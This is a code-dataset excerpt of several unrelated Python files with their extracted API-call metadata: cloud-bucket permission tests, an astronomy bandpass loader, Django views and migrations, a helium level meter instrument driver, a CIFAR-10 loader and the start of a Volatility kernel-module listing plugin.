) as user_client, provider_option.get_admin(bucket) as admin:
await _test_read_access(admin, user_client)
await provider_option.provider.set_role_permissions(
role,
[],
)
async with provider_option.make_client(
bucket, role.credentials
) as user_client, provider_option.get_admin(bucket) as admin:
await _test_no_access(admin, user_client)
| [((52, 1, 52, 12), 'dataclasses.dataclass', 'dataclass', ({}, {}), '()', False, 'from dataclasses import dataclass\n'), ((87, 10, 87, 30), 'secrets.token_hex', 'secrets.token_hex', ({(87, 28, 87, 29): '8'}, {}), '(8)', False, 'import secrets\n'), ((265, 5, 265, 21), 'pytest.fixture', 'pytest.fixture', ({}, {}), '()', False, 'import pytest\n'), ((27, 32, 27, 52), 'secrets.token_hex', 'secrets.token_hex', ({(27, 50, 27, 51): '(5)'}, {}), '(5)', False, 'import secrets\n'), ((31, 30, 31, 50), 'secrets.token_hex', 'secrets.token_hex', ({(31, 48, 31, 49): '(5)'}, {}), '(5)', False, 'import secrets\n'), ((89, 9, 89, 33), 'pytest.raises', 'pytest.raises', ({(89, 23, 89, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((94, 9, 94, 33), 'pytest.raises', 'pytest.raises', ({(94, 23, 94, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((97, 9, 97, 33), 'pytest.raises', 'pytest.raises', ({(97, 23, 97, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((100, 9, 100, 33), 'pytest.raises', 'pytest.raises', ({(100, 23, 100, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((111, 9, 111, 33), 'pytest.raises', 'pytest.raises', ({(111, 23, 111, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((120, 9, 120, 33), 'pytest.raises', 'pytest.raises', ({(120, 23, 120, 32): 'Exception'}, {}), '(Exception)', False, 'import pytest\n'), ((156, 13, 156, 45), 'pytest.raises', 'pytest.raises', ({(156, 27, 156, 44): 'BucketExistsError'}, {}), '(BucketExistsError)', False, 'import pytest\n'), ((168, 13, 168, 48), 'pytest.raises', 'pytest.raises', ({(168, 27, 168, 47): 'BucketNotExistsError'}, {}), '(BucketNotExistsError)', False, 'import pytest\n'), ((186, 12, 186, 76), 'pytest.skip', 'pytest.skip', ({(186, 24, 186, 75): '"""Moto do not support embedding policies into token"""'}, {}), "('Moto do not support embedding policies into token')", False, 'import pytest\n'), ((200, 12, 200, 61), 'pytest.skip', 'pytest.skip', ({(200, 24, 200, 60): '"""Moto fails for signed url with 500"""'}, {}), "('Moto fails for signed url with 500')", False, 'import pytest\n'), ((205, 19, 205, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((214, 12, 214, 65), 'pytest.skip', 'pytest.skip', ({(214, 24, 214, 64): '"""Moto has bad support of this operation"""'}, {}), "('Moto has bad support of this operation')", False, 'import pytest\n'), ((220, 19, 220, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((234, 12, 234, 46), 'pytest.skip', 'pytest.skip', ({(234, 24, 234, 45): '"""Moto fails with 500"""'}, {}), "('Moto fails with 500')", False, 'import pytest\n'), ((255, 19, 255, 34), 'aiohttp.ClientSession', 'ClientSession', ({}, {}), '()', False, 'from aiohttp import ClientSession\n'), ((272, 12, 275, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((310, 13, 310, 43), 'pytest.raises', 'pytest.raises', ({(310, 27, 310, 42): 'RoleExistsError'}, {}), '(RoleExistsError)', False, 'import pytest\n'), ((329, 12, 332, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((347, 12, 350, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((365, 12, 365, 79), 'pytest.skip', 'pytest.skip', ({(365, 24, 365, 78): '"""Azure provider do not support multiple buckets roles"""'}, {}), "('Azure provider do not support multiple buckets roles')", False, 'import pytest\n'), ((369, 12, 372, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((411, 12, 414, 13), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((386, 16, 389, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((390, 16, 393, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((424, 16, 427, 17), 'platform_buckets_api.providers.BucketPermission', 'BucketPermission', (), '', False, 'from platform_buckets_api.providers import BucketExistsError, BucketNotExistsError, BucketPermission, BucketProvider, RoleExistsError, UserBucketOperations\n'), ((245, 27, 245, 53), 'datetime.datetime.now', 'datetime.now', ({(245, 40, 245, 52): 'timezone.utc'}, {}), '(timezone.utc)', False, 'from datetime import datetime, timezone\n')] |
jianyangli/sbpy | sbpy/photometry/bandpass.py | 6b79cbea9bada89207fba17d02dc0c321fa46bf4 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
sbpy bandpass Module
"""
__all__ = [
'bandpass'
]
import os
from astropy.utils.data import get_pkg_data_filename
def bandpass(name):
"""Retrieve bandpass transmission spectrum from sbpy.
Parameters
----------
name : string
Name of the bandpass, case insensitive. See notes for
available filters.
Returns
-------
bp : `~synphot.SpectralElement`
Notes
-----
Available filters:
+-------------+---------------------------+
| Name | Source |
+=============+===========================+
| 2MASS J | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS H | Cohen et al. 2003 |
+-------------+---------------------------+
| 2MASS Ks | Cohen et al. 2003 |
+-------------+---------------------------+
| Cousins R | STScI CDBS, v4 |
+-------------+---------------------------+
| Cousins I | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson U | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson B | STScI CDBS, v4 |
+-------------+---------------------------+
| Johnson V | STScI CDBS, v4 |
+-------------+---------------------------+
| PS1 g | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 r | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 i | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 w | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 y | Tonry et al. 2012 |
+-------------+---------------------------+
| PS1 z | Tonry et al. 2012 |
+-------------+---------------------------+
| SDSS u | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS g | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS r | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS i | SDSS, dated 2001 |
+-------------+---------------------------+
| SDSS z | SDSS, dated 2001 |
+-------------+---------------------------+
| WFC3 F438W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WFC3 F606W | HST/WFC3 UVIS, v4 |
+-------------+---------------------------+
| WISE W1 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W2 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W3 | Jarrett et al. 2011 |
+-------------+---------------------------+
| WISE W4 | Jarrett et al. 2011 |
+-------------+---------------------------+
References
----------
.. [CDBS] Space Telescope Science Institute. HST Calibration Reference
Data System. https://hst-crds.stsci.edu/ .
.. [COH03] Cohen, M. et al. 2003. Spectral Irradiance Calibration
in the Infrared. XIV. The Absolute Calibration of 2MASS. AJ
126, 1090.
.. [JAR11] Jarrett, T. H. et al. 2011. The Spitzer-WISE Survey of
the Ecliptic Poles. ApJ 735, 112.
.. [SDSS] Sloan Digital Sky Survey. Camera.
www.sdss.org/instruments/camera .
.. [TON12] Tonry, J. L. et al. 2012. The Pan-STARRS1 Photometric
System. ApJ 750, 99.
"""
try:
import synphot
except ImportError:
raise ImportError('synphot is required.')
name2file = {
'2mass j': '2mass-j-rsr.txt',
'2mass h': '2mass-h-rsr.txt',
'2mass ks': '2mass-ks-rsr.txt',
'cousins r': 'cousins_r_004_syn.fits',
'cousins i': 'cousins_i_004_syn.fits',
'johnson u': 'johnson_u_004_syn.fits',
'johnson b': 'johnson_b_004_syn.fits',
'johnson v': 'johnson_v_004_syn.fits',
'ps1 g': 'ps1-gp1.txt',
'ps1 r': 'ps1-rp1.txt',
'ps1 i': 'ps1-ip1.txt',
'ps1 w': 'ps1-wp1.txt',
'ps1 y': 'ps1-yp1.txt',
'ps1 z': 'ps1-zp1.txt',
'sdss u': 'sdss-u.fits',
'sdss g': 'sdss-g.fits',
'sdss r': 'sdss-r.fits',
'sdss i': 'sdss-i.fits',
'sdss z': 'sdss-z.fits',
'wfc3 f438w': 'wfc3_uvis_f438w_004_syn.fits',
'wfc3 f606w': 'wfc3_uvis_f606w_004_syn.fits',
'wise w1': 'WISE-RSR-W1.EE.txt',
'wise w2': 'WISE-RSR-W2.EE.txt',
'wise w3': 'WISE-RSR-W3.EE.txt',
'wise w4': 'WISE-RSR-W4.EE.txt',
}
fn = get_pkg_data_filename(os.path.join(
'..', 'photometry', 'data', name2file[name.lower()]))
bp = synphot.SpectralElement.from_file(fn)
return bp
| [((144, 9, 144, 46), 'synphot.SpectralElement.from_file', 'synphot.SpectralElement.from_file', ({(144, 43, 144, 45): 'fn'}, {}), '(fn)', False, 'import synphot\n')] |
sinag/SWE574-Horuscope | appserver/search/views.py | 9725dd356cbfd19f0ce88d4a208c872be765bd88 | from django.http import HttpResponse
from django.shortcuts import render, redirect
from community.models import Community
# Create your views here.
def search_basic(request):
communities = None
if request.POST:
community_query = request.POST.get('community_search', False)
communities = Community.objects.filter(city__icontains=community_query)
print(communities)
return render(request, 'search/search_basic.html', {'communities': communities})
return render(request, 'search/search_basic.html', {'communities': communities})
| [((15, 11, 15, 84), 'django.shortcuts.render', 'render', ({(15, 18, 15, 25): 'request', (15, 27, 15, 53): '"""search/search_basic.html"""', (15, 55, 15, 83): "{'communities': communities}"}, {}), "(request, 'search/search_basic.html', {'communities': communities})", False, 'from django.shortcuts import render, redirect\n'), ((12, 22, 12, 79), 'community.models.Community.objects.filter', 'Community.objects.filter', (), '', False, 'from community.models import Community\n'), ((14, 15, 14, 88), 'django.shortcuts.render', 'render', ({(14, 22, 14, 29): 'request', (14, 31, 14, 57): '"""search/search_basic.html"""', (14, 59, 14, 87): "{'communities': communities}"}, {}), "(request, 'search/search_basic.html', {'communities': communities})", False, 'from django.shortcuts import render, redirect\n')] |
Sudani-Coder/teammanager | teams/migrations/0001_initial.py | 857082bc14d7a783d2327b4e982edba7c061f303 | # Generated by Django 3.1.2 on 2020-10-18 17:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='GameScore',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_team', models.CharField(max_length=200)),
('second_team', models.CharField(max_length=200)),
('first_team_score', models.IntegerField(default=0)),
('second_team_score', models.IntegerField(default=0)),
],
),
migrations.CreateModel(
name='Player',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200)),
('number', models.IntegerField()),
('age', models.IntegerField()),
('position_in_field', models.CharField(choices=[('1', 'حارس'), ('2', 'دفاع'), ('3', 'وسط'), ('4', 'هجوم')], max_length=200)),
],
),
migrations.CreateModel(
name='Team',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, unique=True)),
('details', models.TextField()),
],
),
]
| [((17, 23, 17, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((18, 31, 18, 63), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((19, 32, 19, 64), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((20, 37, 20, 67), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((21, 38, 21, 68), 'django.db.models.IntegerField', 'models.IntegerField', (), '', False, 'from django.db import migrations, models\n'), ((27, 23, 27, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((28, 25, 28, 57), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((29, 27, 29, 48), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((30, 24, 30, 45), 'django.db.models.IntegerField', 'models.IntegerField', ({}, {}), '()', False, 'from django.db import migrations, models\n'), ((31, 38, 31, 154), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((37, 23, 37, 112), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import migrations, models\n'), ((38, 25, 38, 70), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import migrations, models\n'), ((39, 28, 39, 46), 'django.db.models.TextField', 'models.TextField', ({}, {}), '()', False, 'from django.db import migrations, models\n')] |
jenshnielsen/Qcodes_contrib_drivers | qcodes_contrib_drivers/drivers/Oxford/ILM200.py | dc878cdd99a62f4643a62163a3a6341f98cee440 | # OxfordInstruments_ILM200.py class, to perform the communication between the Wrapper and the device
# Copyright (c) 2017 QuTech (Delft)
# Code is available under the available under the `MIT open-source license <https://opensource.org/licenses/MIT>`__
#
# Pieter Eendebak <[email protected]>, 2017
# Takafumi Fujita <[email protected]>, 2016
# Guenevere Prawiroatmodjo <[email protected]>, 2009
# Pieter de Groot <[email protected]>, 2009
from time import sleep
import visa
import logging
from qcodes import VisaInstrument
class OxfordInstruments_ILM200(VisaInstrument):
"""
This is the qcodes driver for the Oxford Instruments ILM 200 Helium Level Meter.
Usage:
Initialize with
<name> = instruments.create('name', 'OxfordInstruments_ILM200', address='<Instrument address>')
<Instrument address> = ASRL4::INSTR
Note: Since the ISOBUS allows for several instruments to be managed in parallel, the command
which is sent to the device starts with '@n', where n is the ISOBUS instrument number.
"""
def __init__(self, name, address, number=1, **kwargs):
"""
Initializes the Oxford Instruments ILM 200 Helium Level Meter.
Args:
name (str): name of the instrument
address (str): instrument address
number (int): ISOBUS instrument number (number=1 is specific to the ILM in F008)
Returns:
None
"""
logging.debug(__name__ + ' : Initializing instrument')
super().__init__(name, address, **kwargs)
self.visa_handle.set_visa_attribute(visa.constants.VI_ATTR_ASRL_STOP_BITS,
visa.constants.VI_ASRL_STOP_TWO)
self._address = address
self._number = number
self._values = {}
self.add_parameter('level',
label='level',
get_cmd=self._do_get_level,
unit='%')
self.add_parameter('status',
get_cmd=self._do_get_status)
self.add_parameter('rate',
get_cmd=self._do_get_rate,
set_cmd=self._do_set_rate)
# a dummy command to avoid the initial error
try:
self.get_idn()
sleep(70e-3) # wait for the device to be able to respond
self._read() # to flush the buffer
except Exception as ex:
logging.debug(ex)
def _execute(self, message):
"""
Write a command to the device and read answer. This function writes to
the buffer by adding the device number at the front, instead of 'ask'.
Args:
message (str) : write command for the device
Returns:
None
"""
logging.info(
__name__ + ' : Send the following command to the device: %s' % message)
self.visa_handle.write('@%s%s' % (self._number, message))
sleep(70e-3) # wait for the device to be able to respond
result = self._read()
if result.find('?') >= 0:
print("Error: Command %s not recognized" % message)
else:
return result
def _read(self):
"""
Reads the total bytes in the buffer and outputs as a string.
Args:
None
Returns:
message (str)
"""
# because protocol has no termination chars the read reads the number
# of bytes in the buffer
bytes_in_buffer = self.visa_handle.bytes_in_buffer
# a workaround for a timeout error in the pyvsia read_raw() function
with(self.visa_handle.ignore_warning(visa.constants.VI_SUCCESS_MAX_CNT)):
mes = self.visa_handle.visalib.read(
self.visa_handle.session, bytes_in_buffer)
# cannot be done on same line for some reason
mes = str(mes[0].decode())
return mes
def get_idn(self):
"""
Overrides the function of Instrument since ILM does not support `*IDN?`
This string is supposed to be a
comma-separated list of vendor, model, serial, and firmware, but
semicolon and colon are also common separators so we accept them here
as well.
Returns:
A dict containing vendor, model, serial, and firmware.
"""
try:
idstr = '' # in case self.ask fails
idstr = self._get_version().split()
# form is supposed to be comma-separated, but we've seen
# other separators occasionally
idparts = [idstr[3] + ' ' + idstr[4], idstr[0], idstr[5],
idstr[1] + ' ' + idstr[2]]
# in case parts at the end are missing, fill in None
if len(idparts) < 4:
idparts += [None] * (4 - len(idparts))
except Exception as ex:
logging.warn('Error getting or interpreting *IDN?: ' + repr(idstr))
logging.debug(ex)
idparts = [None, None, None, None]
return dict(zip(('vendor', 'model', 'serial', 'firmware'), idparts))
def get_all(self):
"""
Reads all implemented parameters from the instrument,
and updates the wrapper.
"""
logging.info(__name__ + ' : reading all settings from instrument')
self.level.get()
self.status.get()
self.rate.get()
def close(self):
"""
Safely close connection
"""
logging.info(__name__ + ' : Closing ILM200 connection')
self.local()
super().close()
# Functions: Monitor commands
def _get_version(self):
"""
Identify the device
Args:
None
Returns:
identification (str): should be 'ILM200 Version 1.08 (c) OXFORD 1994\r'
"""
logging.info(__name__ + ' : Identify the device')
return self._execute('V')
def _do_get_level(self):
"""
Get Helium level of channel 1.
Args:
None
Returns:
result (float) : Helium level
"""
logging.info(__name__ + ' : Read level of channel 1')
result = self._execute('R1')
return float(result.replace("R", "")) / 10
def _do_get_status(self):
"""
Get status of the device.
"""
logging.info(__name__ + ' : Get status of the device.')
result = self._execute('X')
usage = {
0: "Channel not in use",
1: "Channel used for Nitrogen level",
2: "Channel used for Helium Level (Normal pulsed operation)",
3: "Channel used for Helium Level (Continuous measurement)",
9: "Error on channel (Usually means probe unplugged)"
}
# current_flowing = {
# 0 : "Curent not flowing in Helium Probe Wire",
# 1 : "Curent not flowing in Helium Probe Wire"
# }
# auto_fill_status = {
# 00 : "End Fill (Level > FULL)",
# 01 : "Not Filling (Level < FULL, Level > FILL)",
# 10 : "Filling (Level < FULL, Level > FILL)",
# 11 : "Start Filling (Level < FILL)"
# }
return usage.get(int(result[1]), "Unknown")
def _do_get_rate(self):
"""
Get helium meter channel 1 probe rate
Input:
None
Output:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
rate = {
1: "1 : Helium Probe in FAST rate",
0: "0 : Helium Probe in SLOW rate"
}
result = self._execute('X')
return rate.get(int(format(int(result[5:7]), '08b')[6]), "Unknown")
def remote(self):
"""
Set control to remote & locked
"""
logging.info(__name__ + ' : Set control to remote & locked')
self.set_remote_status(1)
def local(self):
"""
Set control to local & locked
"""
logging.info(__name__ + ' : Set control to local & locked')
self.set_remote_status(0)
def set_remote_status(self, mode):
"""
Set remote control status.
Args:
mode(int) :
0 : "Local and locked",
1 : "Remote and locked",
2 : "Local and unlocked",
3 : "Remote and unlocked",
Returns:
None
"""
status = {
0: "Local and locked",
1: "Remote and locked",
2: "Local and unlocked",
3: "Remote and unlocked",
}
logging.info(__name__ + ' : Setting remote control status to %s' %
status.get(mode, "Unknown"))
self._execute('C%s' % mode)
# Functions: Control commands (only recognised when in REMOTE control)
def set_to_slow(self):
"""
Set helium meter channel 1 to slow mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in SLOW rate')
self._execute('S1')
self.set_remote_status(3)
def set_to_fast(self):
"""
Set helium meter channel 1 to fast mode.
"""
self.set_remote_status(1)
logging.info(__name__ + ' : Setting Helium Probe in FAST rate')
self._execute('T1')
self.set_remote_status(3)
def _do_set_rate(self, rate):
"""
Set helium meter channel 1 probe rate
Args:
rate(int) :
0 : "SLOW"
1 : "FAST"
"""
self.set_remote_status(1)
if rate == 0:
self.set_to_slow()
elif rate == 1:
self.set_to_fast()
self.set_remote_status(3)
logging.info(self._do_get_rate())
| [((43, 8, 43, 62), 'logging.debug', 'logging.debug', ({(43, 22, 43, 61): "(__name__ + ' : Initializing instrument')"}, {}), "(__name__ + ' : Initializing instrument')", False, 'import logging\n'), ((81, 8, 82, 83), 'logging.info', 'logging.info', ({(82, 12, 82, 82): "(__name__ + ' : Send the following command to the device: %s' % message)"}, {}), "(__name__ + ' : Send the following command to the device: %s' %\n message)", False, 'import logging\n'), ((84, 8, 84, 20), 'time.sleep', 'sleep', ({(84, 14, 84, 19): '(0.07)'}, {}), '(0.07)', False, 'from time import sleep\n'), ((146, 8, 146, 74), 'logging.info', 'logging.info', ({(146, 21, 146, 73): "(__name__ + ' : reading all settings from instrument')"}, {}), "(__name__ + ' : reading all settings from instrument')", False, 'import logging\n'), ((155, 8, 155, 63), 'logging.info', 'logging.info', ({(155, 21, 155, 62): "(__name__ + ' : Closing ILM200 connection')"}, {}), "(__name__ + ' : Closing ILM200 connection')", False, 'import logging\n'), ((170, 8, 170, 57), 'logging.info', 'logging.info', ({(170, 21, 170, 56): "(__name__ + ' : Identify the device')"}, {}), "(__name__ + ' : Identify the device')", False, 'import logging\n'), ((183, 8, 183, 61), 'logging.info', 'logging.info', ({(183, 21, 183, 60): "(__name__ + ' : Read level of channel 1')"}, {}), "(__name__ + ' : Read level of channel 1')", False, 'import logging\n'), ((191, 8, 191, 63), 'logging.info', 'logging.info', ({(191, 21, 191, 62): "(__name__ + ' : Get status of the device.')"}, {}), "(__name__ + ' : Get status of the device.')", False, 'import logging\n'), ((235, 8, 235, 68), 'logging.info', 'logging.info', ({(235, 21, 235, 67): "(__name__ + ' : Set control to remote & locked')"}, {}), "(__name__ + ' : Set control to remote & locked')", False, 'import logging\n'), ((242, 8, 242, 67), 'logging.info', 'logging.info', ({(242, 21, 242, 66): "(__name__ + ' : Set control to local & locked')"}, {}), "(__name__ + ' : Set control to local & locked')", False, 'import logging\n'), ((275, 8, 275, 71), 'logging.info', 'logging.info', ({(275, 21, 275, 70): "(__name__ + ' : Setting Helium Probe in SLOW rate')"}, {}), "(__name__ + ' : Setting Helium Probe in SLOW rate')", False, 'import logging\n'), ((284, 8, 284, 71), 'logging.info', 'logging.info', ({(284, 21, 284, 70): "(__name__ + ' : Setting Helium Probe in FAST rate')"}, {}), "(__name__ + ' : Setting Helium Probe in FAST rate')", False, 'import logging\n'), ((65, 12, 65, 24), 'time.sleep', 'sleep', ({(65, 18, 65, 23): '(0.07)'}, {}), '(0.07)', False, 'from time import sleep\n'), ((68, 12, 68, 29), 'logging.debug', 'logging.debug', ({(68, 26, 68, 28): 'ex'}, {}), '(ex)', False, 'import logging\n'), ((136, 12, 136, 29), 'logging.debug', 'logging.debug', ({(136, 26, 136, 28): 'ex'}, {}), '(ex)', False, 'import logging\n')] |
xgxofdream/CNN-Using-Local-CIFAR-10-dataset | load_cifar_10.py | 8076056da58a5b564ded50f4cdb059585deb900d | import numpy as np
import matplotlib.pyplot as plt
import pickle
"""
The CIFAR-10 dataset consists of 60000 32x32 colour images in 10 classes, with 6000 images per class. There are 50000
training images and 10000 test images.
The dataset is divided into five training batches and one test batch, each with 10000 images. The test batch contains
exactly 1000 randomly-selected images from each class. The training batches contain the remaining images in random
order, but some training batches may contain more images from one class than another. Between them, the training
batches contain exactly 5000 images from each class.
"""
def unpickle(file):
"""load the cifar-10 data"""
with open(file, 'rb') as fo:
data = pickle.load(fo, encoding='bytes')
return data
def load_cifar_10_data(data_dir, negatives=False):
"""
Return train_data, train_filenames, train_labels, test_data, test_filenames, test_labels
"""
# get the meta_data_dict
# num_cases_per_batch: 1000
# label_names: ['airplane', 'automobile', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck']
# num_vis: :3072
meta_data_dict = unpickle(data_dir + "/batches.meta")
cifar_label_names = meta_data_dict[b'label_names']
cifar_label_names = np.array(cifar_label_names)
# training data
cifar_train_data = None
cifar_train_filenames = []
cifar_train_labels = []
# cifar_train_data_dict
# 'batch_label': 'training batch 5 of 5'
# 'data': ndarray
# 'filenames': list
# 'labels': list
for i in range(1, 6):
cifar_train_data_dict = unpickle(data_dir + "/data_batch_{}".format(i))
if i == 1:
cifar_train_data = cifar_train_data_dict[b'data']
else:
cifar_train_data = np.vstack((cifar_train_data, cifar_train_data_dict[b'data']))
cifar_train_filenames += cifar_train_data_dict[b'filenames']
cifar_train_labels += cifar_train_data_dict[b'labels']
cifar_train_data = cifar_train_data.reshape((len(cifar_train_data), 3, 32, 32))
if negatives:
cifar_train_data = cifar_train_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_train_data = np.rollaxis(cifar_train_data, 1, 4)
cifar_train_filenames = np.array(cifar_train_filenames)
cifar_train_labels = np.array(cifar_train_labels)
# test data
# cifar_test_data_dict
# 'batch_label': 'testing batch 1 of 1'
# 'data': ndarray
# 'filenames': list
# 'labels': list
cifar_test_data_dict = unpickle(data_dir + "/test_batch")
cifar_test_data = cifar_test_data_dict[b'data']
cifar_test_filenames = cifar_test_data_dict[b'filenames']
cifar_test_labels = cifar_test_data_dict[b'labels']
cifar_test_data = cifar_test_data.reshape((len(cifar_test_data), 3, 32, 32))
if negatives:
cifar_test_data = cifar_test_data.transpose(0, 2, 3, 1).astype(np.float32)
else:
cifar_test_data = np.rollaxis(cifar_test_data, 1, 4)
cifar_test_filenames = np.array(cifar_test_filenames)
cifar_test_labels = np.array(cifar_test_labels)
return cifar_train_data, cifar_train_filenames, cifar_train_labels, \
cifar_test_data, cifar_test_filenames, cifar_test_labels, cifar_label_names
if __name__ == "__main__":
"""show it works"""
cifar_10_dir = '.\cifar10-dataset'
train_data, train_filenames, train_labels, test_data, test_filenames, test_labels, label_names = \
load_cifar_10_data(cifar_10_dir)
print("Train data: ", train_data.shape)
print("Train filenames: ", train_filenames.shape)
print("Train labels: ", train_labels.shape)
print("Test data: ", test_data.shape)
print("Test filenames: ", test_filenames.shape)
print("Test labels: ", test_labels.shape)
print("Label names: ", label_names.shape)
# Don't forget that the label_names and filesnames are in binary and need conversion if used.
# display some random training images in a 25x25 grid
num_plot = 5
f, ax = plt.subplots(num_plot, num_plot)
for m in range(num_plot):
for n in range(num_plot):
idx = np.random.randint(0, train_data.shape[0])
ax[m, n].imshow(train_data[idx])
ax[m, n].get_xaxis().set_visible(False)
ax[m, n].get_yaxis().set_visible(False)
f.subplots_adjust(hspace=0.1)
f.subplots_adjust(wspace=0)
plt.show()
| [((36, 24, 36, 51), 'numpy.array', 'np.array', ({(36, 33, 36, 50): 'cifar_label_names'}, {}), '(cifar_label_names)', True, 'import numpy as np\n'), ((63, 28, 63, 59), 'numpy.array', 'np.array', ({(63, 37, 63, 58): 'cifar_train_filenames'}, {}), '(cifar_train_filenames)', True, 'import numpy as np\n'), ((64, 25, 64, 53), 'numpy.array', 'np.array', ({(64, 34, 64, 52): 'cifar_train_labels'}, {}), '(cifar_train_labels)', True, 'import numpy as np\n'), ((83, 27, 83, 57), 'numpy.array', 'np.array', ({(83, 36, 83, 56): 'cifar_test_filenames'}, {}), '(cifar_test_filenames)', True, 'import numpy as np\n'), ((84, 24, 84, 51), 'numpy.array', 'np.array', ({(84, 33, 84, 50): 'cifar_test_labels'}, {}), '(cifar_test_labels)', True, 'import numpy as np\n'), ((110, 12, 110, 44), 'matplotlib.pyplot.subplots', 'plt.subplots', ({(110, 25, 110, 33): 'num_plot', (110, 35, 110, 43): 'num_plot'}, {}), '(num_plot, num_plot)', True, 'import matplotlib.pyplot as plt\n'), ((119, 4, 119, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((20, 15, 20, 48), 'pickle.load', 'pickle.load', (), '', False, 'import pickle\n'), ((62, 27, 62, 62), 'numpy.rollaxis', 'np.rollaxis', ({(62, 39, 62, 55): 'cifar_train_data', (62, 57, 62, 58): '1', (62, 60, 62, 61): '4'}, {}), '(cifar_train_data, 1, 4)', True, 'import numpy as np\n'), ((82, 26, 82, 60), 'numpy.rollaxis', 'np.rollaxis', ({(82, 38, 82, 53): 'cifar_test_data', (82, 55, 82, 56): '1', (82, 58, 82, 59): '4'}, {}), '(cifar_test_data, 1, 4)', True, 'import numpy as np\n'), ((54, 31, 54, 92), 'numpy.vstack', 'np.vstack', ({(54, 41, 54, 91): "(cifar_train_data, cifar_train_data_dict[b'data'])"}, {}), "((cifar_train_data, cifar_train_data_dict[b'data']))", True, 'import numpy as np\n'), ((113, 18, 113, 59), 'numpy.random.randint', 'np.random.randint', ({(113, 36, 113, 37): '0', (113, 39, 113, 58): 'train_data.shape[0]'}, {}), '(0, train_data.shape[0])', True, 'import numpy as np\n')] |
leohearts/volatility3 | volatility3/framework/plugins/mac/lsmod.py | f52bd8d74fc47e63ea2611d0171b63dc589d4fdf | # This file is Copyright 2019 Volatility Foundation and licensed under the Volatility Software License 1.0
# which is available at https://www.volatilityfoundation.org/license/vsl-v1.0
#
"""A module containing a collection of plugins that produce data typically
found in Mac's lsmod command."""
from volatility3.framework import renderers, interfaces, contexts
from volatility3.framework.configuration import requirements
from volatility3.framework.interfaces import plugins
from volatility3.framework.objects import utility
from volatility3.framework.renderers import format_hints
class Lsmod(plugins.PluginInterface):
"""Lists loaded kernel modules."""
_required_framework_version = (1, 0, 0)
_version = (1, 0, 0)
@classmethod
def get_requirements(cls):
return [
requirements.TranslationLayerRequirement(name = 'primary',
description = 'Memory layer for the kernel',
